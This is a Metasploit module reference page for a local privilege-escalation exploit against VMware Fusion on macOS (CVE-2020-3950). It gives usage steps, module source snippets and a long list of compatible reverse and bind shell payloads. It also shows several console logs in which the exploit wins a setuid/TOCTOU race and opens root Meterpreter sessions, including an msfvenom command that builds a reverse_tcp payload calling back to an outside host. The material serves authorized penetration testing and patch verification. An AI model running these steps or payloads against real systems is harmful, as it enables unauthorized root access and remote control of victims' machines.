VMware Fusion USB Arbitrator Setuid Privilege Escalation - Metasploit
This page contains detailed information about how to use the exploit/osx/local/vmware_fusion_lpe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: VMware Fusion USB Arbitrator Setuid Privilege Escalation
Module: exploit/osx/local/vmware_fusion_lpe
Source code: modules/exploits/osx/local/vmware_fusion_lpe.rb
Disclosure date: 2020-03-17
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): x86, x64
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-3950
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. The Open VMware USB Arbitrator Service can be launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home directory in a specific folder, and creating a hard link to the 'Open VMware USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload with an effective UID of 0. @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race. Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/osx/local/vmware_fusion_lpe
msf exploit(vmware_fusion_lpe) > show targets
... a list of targets ...
msf exploit(vmware_fusion_lpe) > set TARGET target-id
msf exploit(vmware_fusion_lpe) > show options
... show and set options ...
msf exploit(vmware_fusion_lpe) > set SESSION session-id
msf exploit(vmware_fusion_lpe) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. The Open VMware USB Arbitrator Service
can be
launched outide of its standard path which allows loading of an attacker controlled binary. By creating a payload in the user home
directory in a specific folder, and creating a hard link to the Open VMware USB Arbitrator Service
, we're able to launch it
temporarily to start our payload with an effective UID of 0.
Additional description can be found in @mirchr's exploit.
It was found that VMware Fusion 11.5.3, which patched the previous vulnerability utilized an incomplete patch. The patch checked
for a correct code signature on the VMware USB Arbitrator Service
at start, but not at launch, thus creating a TOCTOU race
condition. The discoverer @jeffball55 demoed the exploit working in ~30 attempts. This module has been successful between
5 and 25 attempts.
VMware Fusion 11.5.1 is available from VMware.
Verification Steps
- Install the application
- Start msfconsole
- Get a shell
- Do:
use exploit/osx/local/vmware_fusion_lpe
- Do:
set session #
- Do:
run
- You should get a
euid=0
shell.
Options
MAXATTEMPTS
The maximum attempts to start VMware USB Arbitrator Service
, attempting to win the race against 11.5.3. Default is 75
.
Session
Which session to use this exploit on.
Scenarios
VMware Fusion 10.1.6
msf5 exploit(osx/local/vmware_fusion_lpe) > run
[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444
[+] Vmware Fusion 10.1.6 is exploitable
[*] Using pre-11.5.3 exploit
[*] Uploading Payload: /Users/wvu/Contents/Library/services/VMware USB Arbitrator Service
[*] Max line length is 131073
[*] Writing 804084 bytes in 25 chunks of 111592 bytes (octal-encoded), using printf
[*] Next chunk is 117552 bytes
[*] Next chunk is 116480 bytes
[*] Next chunk is 114764 bytes
[*] Next chunk is 113263 bytes
[*] Next chunk is 111420 bytes
[*] Next chunk is 112649 bytes
[*] Next chunk is 115231 bytes
[*] Next chunk is 113278 bytes
[*] Next chunk is 114696 bytes
[*] Next chunk is 114109 bytes
[*] Next chunk is 118500 bytes
[*] Next chunk is 119288 bytes
[*] Next chunk is 116736 bytes
[*] Next chunk is 114000 bytes
[*] Next chunk is 114444 bytes
[*] Next chunk is 114460 bytes
[*] Next chunk is 116528 bytes
[*] Next chunk is 112788 bytes
[*] Next chunk is 84713 bytes
[*] Next chunk is 106180 bytes
[*] Next chunk is 89744 bytes
[*] Next chunk is 87533 bytes
[*] Next chunk is 127271 bytes
[*] Next chunk is 71468 bytes
[*] Created folder (/Users/wvu/Bvr/k8h88/GAymi/) and link
[*] Starting USB Service (5 sec pause)
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:63876) at 2020-04-02 11:00:59 -0500
[+] Deleted /Users/wvu/Contents/Library/services/VMware USB Arbitrator Service
[*] Killing service
[*] Deleting /Users/wvu/Bvr
meterpreter > getuid
Server username: wvu @ [redacted] (uid=[redacted], gid=[redacted], euid=0, egid=[redacted])
meterpreter >
VMware Fusion 11.5.1 (15018442) on macOS 10.15.3 (19D76)
/msfvenom --payload python/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8888 -b "\x00" -o /var/www/html/meterp_8888.py
[*] Processing fusion.rb for ERB directives.
resource (fusion.rb)> setg verbose true
verbose => true
resource (fusion.rb)> use exploit/multi/handler
resource (fusion.rb)> set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
resource (fusion.rb)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (fusion.rb)> set lport 8888
lport => 8888
resource (fusion.rb)> exploit
[+] Vmware Fusion 11.5.1 is exploitable
[*] The target appears to be vulnerable.
[*] Started reverse TCP handler on 1.1.1.1:8888
[*] Sending stage (53755 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49265) at 2020-03-23 18:07:57 -0400
meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer : h00dies-MBP.doman
OS : Darwin 19.3.0 Darwin Kernel Version 19.3.0: Thu Jan 9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
Architecture : x64
System Language : en_US
Meterpreter : python/osx
meterpreter > background
[*] Backgrounding session 1...
resource (fusion.rb)> use exploit/osx/local/vmware_fusion_lpe
resource (fusion.rb)> set session 1
session => 1
resource (fusion.rb)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444
[+] Vmware Fusion 11.5.1 is exploitable
[*] Using pre-11.5.3 exploit
[*] Uploading Payload: /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
[*] Creating folder (/Users/h00die/2KLH/s0m/wX8XO/) and link
[*] Starting USB Arbitrator Service (5 sec pause)
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49269) at 2020-03-23 18:08:14 -0400
[+] Deleted /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
[*] Killing service
[*] Deleting /Users/h00die/2KLH
meterpreter > getuid
Server username: h00die @ h00dies-MBP.domain (uid=501, gid=20, euid=0, egid=20)
meterpreter > sysinfo
Computer : h00dies-MBP.domain
OS : macOS Unknown (macOS 10.15.3)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
VMWare Fusion 11.5.3 on macOS 10.15.3
resource (fusion.rb)> setg verbose true
verbose => true
resource (fusion.rb)> use exploit/multi/handler
resource (fusion.rb)> set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
resource (fusion.rb)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (fusion.rb)> set lport 8888
lport => 8888
resource (fusion.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:8888
[*] Sending stage (53755 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:8888 -> 2.2.2.2:49198) at 2020-03-28 07:37:16 -0400
meterpreter > getuid
Server username: h00die
meterpreter > sysinfo
Computer : h00dies-MBP.ragedomain
OS : Darwin 19.3.0 Darwin Kernel Version 19.3.0: Thu Jan 9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
Architecture : x64
System Language : en_US
Meterpreter : python/osx
meterpreter > background
[*] Backgrounding session 1...
resource (fusion.rb)> use exploit/osx/local/vmware_fusion_lpe
resource (fusion.rb)> set session 1
session => 1
resource (fusion.rb)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444
[+] Vmware Fusion 11.5.3 is exploitable
[*] Using 11.5.3 exploit
[*] Uploading Payload to /Users/h00die/Contents/Library/services/SAGgama
[*] Uploading race condition executable.
[*] Writing '/Users/h00die/Contents/Library/services/TVOK7bDP' (342 bytes) ...
[*] Creating folder (/Users/h00die/weGd/JvR/VoYDt/) and link
[*] Writing '/Users/h00die/Contents/Library/services/alYnwGRyo' (178 bytes) ...
[*] Launching Exploit /Users/h00die/Contents/Library/services/alYnwGRyo
[*] attempt 1
[*] Exploit Finished, killing
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:49213) at 2020-03-28 07:37:28 -0400
[-] Unable to delete /Users/h00die/Contents/Library/services/VMware USB Arbitrator Service
[+] Deleted /Users/h00die/Contents/Library/services/TVOK7bDP
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_fs_delete_dir: Operation failed: Python exception: OSError
[*] Exploit completed, but no session was created.
msf5 exploit(osx/local/vmware_fusion_lpe) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: h00die @ h00dies-MBP.ragedomain (uid=501, gid=20, euid=0, egid=20)
meterpreter > sysinfo
Computer : h00dies-MBP.ragedomain
OS : macOS Unknown (macOS 10.15.3)
Architecture : x86
BuildTuple : x86_64-apple-darwin
Meterpreter : x64/osx
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the osx/local/vmware_fusion_lpe exploit module looks in the msfconsole:
msf6 > use exploit/osx/local/vmware_fusion_lpe
[*] Using configured payload osx/x64/meterpreter_reverse_tcp
msf6 exploit(osx/local/vmware_fusion_lpe) > show info
Name: VMware Fusion USB Arbitrator Setuid Privilege Escalation
Module: exploit/osx/local/vmware_fusion_lpe
Platform: OSX
Arch: x86, x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2020-03-17
Provided by:
h00die
Dhanesh Kizhakkinan
Rich Mirch
jeffball <[email protected]>
grimm
Available targets:
Id Name
-- ----
0 Auto
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
MAXATTEMPTS 75 yes Maximum attempts to win race for 11.5.3
SESSION yes The session to run this module on.
Payload information:
Description:
This exploits an improper use of setuid binaries within VMware
Fusion 10.1.3 - 11.5.3. The Open VMware USB Arbitrator Service can
be launched outide of its standard path which allows loading of an
attacker controlled binary. By creating a payload in the user home
directory in a specific folder, and creating a hard link to the
'Open VMware USB Arbitrator Service' binary, we're able to launch it
temporarily to start our payload with an effective UID of 0.
@jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU
race. Successfully tested against 10.1.6, 11.5.1, 11.5.2, and
11.5.3.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-3950
https://www.exploit-db.com/exploits/48235
https://www.vmware.com/security/advisories/VMSA-2020-0005.html
https://twitter.com/jeffball55/status/1242530508053110785?s=20
https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt
Module Options
This is a complete list of options available in the osx/local/vmware_fusion_lpe exploit:
msf6 exploit(osx/local/vmware_fusion_lpe) > show options
Module options (exploit/osx/local/vmware_fusion_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXATTEMPTS 75 yes Maximum attempts to win race for 11.5.3
SESSION yes The session to run this module on.
Payload options (osx/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Auto
Advanced Options
Here is a complete list of advanced options supported by the osx/local/vmware_fusion_lpe exploit:
msf6 exploit(osx/local/vmware_fusion_lpe) > show advanced
Module advanced options (exploit/osx/local/vmware_fusion_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 15 no Additional delay in seconds to wait for a session
Payload advanced options (osx/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the osx/local/vmware_fusion_lpe module can exploit:
msf6 exploit(osx/local/vmware_fusion_lpe) > show targets
Exploit targets:
Id Name
-- ----
0 Auto
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the osx/local/vmware_fusion_lpe exploit:
msf6 exploit(osx/local/vmware_fusion_lpe) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
3 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
4 payload/generic/tight_loop normal No Generic x86 Tight Loop
5 payload/osx/x64/dupandexecve/bind_tcp normal No OS X dup2 Command Shell, Bind TCP Stager
6 payload/osx/x64/dupandexecve/reverse_tcp normal No OS X dup2 Command Shell, Reverse TCP Stager
7 payload/osx/x64/dupandexecve/reverse_tcp_uuid normal No OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
8 payload/osx/x64/exec normal No OS X x64 Execute Command
9 payload/osx/x64/meterpreter/bind_tcp normal No OSX Meterpreter, Bind TCP Stager
10 payload/osx/x64/meterpreter/reverse_tcp normal No OSX Meterpreter, Reverse TCP Stager
11 payload/osx/x64/meterpreter/reverse_tcp_uuid normal No OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
12 payload/osx/x64/meterpreter_reverse_http normal No OSX Meterpreter, Reverse HTTP Inline
13 payload/osx/x64/meterpreter_reverse_https normal No OSX Meterpreter, Reverse HTTPS Inline
14 payload/osx/x64/meterpreter_reverse_tcp normal No OSX Meterpreter, Reverse TCP Inline
15 payload/osx/x64/say normal No OS X x64 say Shellcode
16 payload/osx/x64/shell_bind_tcp normal No OS X x64 Shell Bind TCP
17 payload/osx/x64/shell_reverse_tcp normal No OS X x64 Shell Reverse TCP
18 payload/osx/x86/bundleinject/bind_tcp normal No Mac OS X Inject Mach-O Bundle, Bind TCP Stager
19 payload/osx/x86/bundleinject/reverse_tcp normal No Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
20 payload/osx/x86/exec normal No OS X Execute Command
21 payload/osx/x86/isight/bind_tcp normal No Mac OS X x86 iSight Photo Capture, Bind TCP Stager
22 payload/osx/x86/isight/reverse_tcp normal No Mac OS X x86 iSight Photo Capture, Reverse TCP Stager
23 payload/osx/x86/shell_bind_tcp normal No OS X Command Shell, Bind TCP Inline
24 payload/osx/x86/shell_reverse_tcp normal No OS X Command Shell, Reverse TCP Inline
25 payload/osx/x86/vforkshell/bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Stager
26 payload/osx/x86/vforkshell/reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Stager
27 payload/osx/x86/vforkshell_bind_tcp normal No OS X (vfork) Command Shell, Bind TCP Inline
28 payload/osx/x86/vforkshell_reverse_tcp normal No OS X (vfork) Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the osx/local/vmware_fusion_lpe exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(osx/local/vmware_fusion_lpe) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Unable to determine home dir for shell.
- Unable to determine VMware Fusion version. Set ForceExploit to override.
- '<OPEN_USB_SERVICE>' binary missing
- VMware Fusion <VERSION> is NOT exploitable
- Session already has root privileges. Set ForceExploit to override
- <CONTENT_DIR> exists. Unable to delete automatically. Please delete or exploit will fail.
- <BASE_DIR> is not writable.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Unable to determine home dir for shell.
Here is a relevant code snippet related to the "Unable to determine home dir for shell." error message:
69: end
70:
71: def get_home_dir
72: home = cmd_exec 'echo ~'
73: if home.blank?
74: fail_with Failure::BadConfig, 'Unable to determine home dir for shell.'
75: end
76: home
77: end
78:
79: def content_dir
Unable to determine VMware Fusion version. Set ForceExploit to override.
Here is a relevant code snippet related to the "Unable to determine VMware Fusion version. Set ForceExploit to override." error message:
92: def get_version
93: # Thanks to @ddouhine on github for this answer!
94: version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString"
95: /=> "(?<version>\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw # supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2
96: if version_raw.blank?
97: fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.'
98: end
99: Rex::Version.new(version)
100: end
101:
102: def pre_11_5_3
'<OPEN_USB_SERVICE>' binary missing
Here is a relevant code snippet related to the "'<OPEN_USB_SERVICE>' binary missing" error message:
179: # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder
180: end
181:
182: def check
183: unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}"
184: print_bad "'#{open_usb_service}' binary missing"
185: return CheckCode::Safe
186: end
187: version = get_version
188: if version.between?(Rex::Version.new('10.1.3'), Rex::Version.new('11.5.3'))
189: vprint_good "Vmware Fusion #{version} is exploitable"
VMware Fusion <VERSION> is NOT exploitable
Here is a relevant code snippet related to the "VMware Fusion <VERSION> is NOT exploitable" error message:
186: end
187: version = get_version
188: if version.between?(Rex::Version.new('10.1.3'), Rex::Version.new('11.5.3'))
189: vprint_good "Vmware Fusion #{version} is exploitable"
190: else
191: print_bad "VMware Fusion #{version} is NOT exploitable"
192: return CheckCode::Safe
193: end
194: CheckCode::Appears
195: end
196:
Session already has root privileges. Set ForceExploit to override
Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override" error message:
195: end
196:
197: def exploit
198: # Check if we're already root
199: if is_root? && !datastore['ForceExploit']
200: fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
201: end
202:
203: # Make sure we can write our payload to the remote system
204: rm_rf content_dir # live dangerously.
205: if directory? content_dir
<CONTENT_DIR> exists. Unable to delete automatically. Please delete or exploit will fail.
Here is a relevant code snippet related to the "<CONTENT_DIR> exists. Unable to delete automatically. Please delete or exploit will fail." error message:
201: end
202:
203: # Make sure we can write our payload to the remote system
204: rm_rf content_dir # live dangerously.
205: if directory? content_dir
206: fail_with Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
207: end
208: cmd_exec "mkdir -p #{base_dir}"
209: register_dirs_for_cleanup content_dir
210: unless writable? base_dir
211: fail_with Failure::BadConfig, "#{base_dir} is not writable."
<BASE_DIR> is not writable.
Here is a relevant code snippet related to the "<BASE_DIR> is not writable." error message:
206: fail_with Failure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail."
207: end
208: cmd_exec "mkdir -p #{base_dir}"
209: register_dirs_for_cleanup content_dir
210: unless writable? base_dir
211: fail_with Failure::BadConfig, "#{base_dir} is not writable."
212: end
213:
214: version = get_version
215: if version == Rex::Version.new('11.5.3')
216: vprint_status 'Using 11.5.3 exploit'
Go back to menu.
Related Pull Requests
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_file
method - #15540 Merged Pull Request: Add option for running
cmd_execute
in a subshell - #15303 Merged Pull Request: Fix
dir
method for windows shell sessions - #15547 Merged Pull Request: Bump rex-text to 0.2.36
References
- CVE-2020-3950
- EDB-48235
- https://www.vmware.com/security/advisories/VMSA-2020-0005.html
- https://twitter.com/jeffball55/status/1242530508053110785?s=20
- https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt
See Also
Check also the following modules related to this module:
- exploit/osx/local/vmware_bash_function_root
- exploit/osx/local/cfprefsd_race_condition
- exploit/osx/local/dyld_print_to_file_root
- exploit/osx/local/feedback_assistant_root
- exploit/osx/local/iokit_keyboard_root
- exploit/osx/local/libxpc_mitm_ssudo
- exploit/osx/local/nfs_mount_root
- exploit/osx/local/persistence
- exploit/osx/local/root_no_password
- exploit/osx/local/rootpipe
- exploit/osx/local/rootpipe_entitlements
- exploit/osx/local/rsh_libmalloc
- exploit/osx/local/setuid_tunnelblick
- exploit/osx/local/setuid_viscosity
- exploit/osx/local/sudo_password_bypass
- exploit/osx/local/timemachine_cmd_injection
- exploit/osx/local/tpwn
- exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
- exploit/linux/http/vmware_vcenter_analytics_file_upload
- exploit/linux/http/vmware_vcenter_vsan_health_rce
- exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
- exploit/linux/http/vmware_vrops_mgr_ssrf_rce
- exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
- exploit/linux/local/vmware_alsa_config
- exploit/linux/local/vmware_mount
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/ssh/vmware_vdp_known_privkey
- exploit/multi/http/vmware_vcenter_log4shell
- exploit/multi/http/vmware_vcenter_uploadova_rce
- exploit/windows/http/vmware_vcenter_chargeback_upload
- exploit/osx/browser/safari_proxy_object_type_confusion
Related Nessus plugins:
- VMware Workstation 15.0.x < 15.5.2 Multiple Vulnerabilities (VMSA-2020-0005)
- VMware Fusion 11.0.x < 11.5.2 Multiple Vulnerabilities (VMSA-2020-0005)
Authors
- h00die
- Dhanesh Kizhakkinan
- Rich Mirch
- jeffball <[email protected]>
- grimm
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.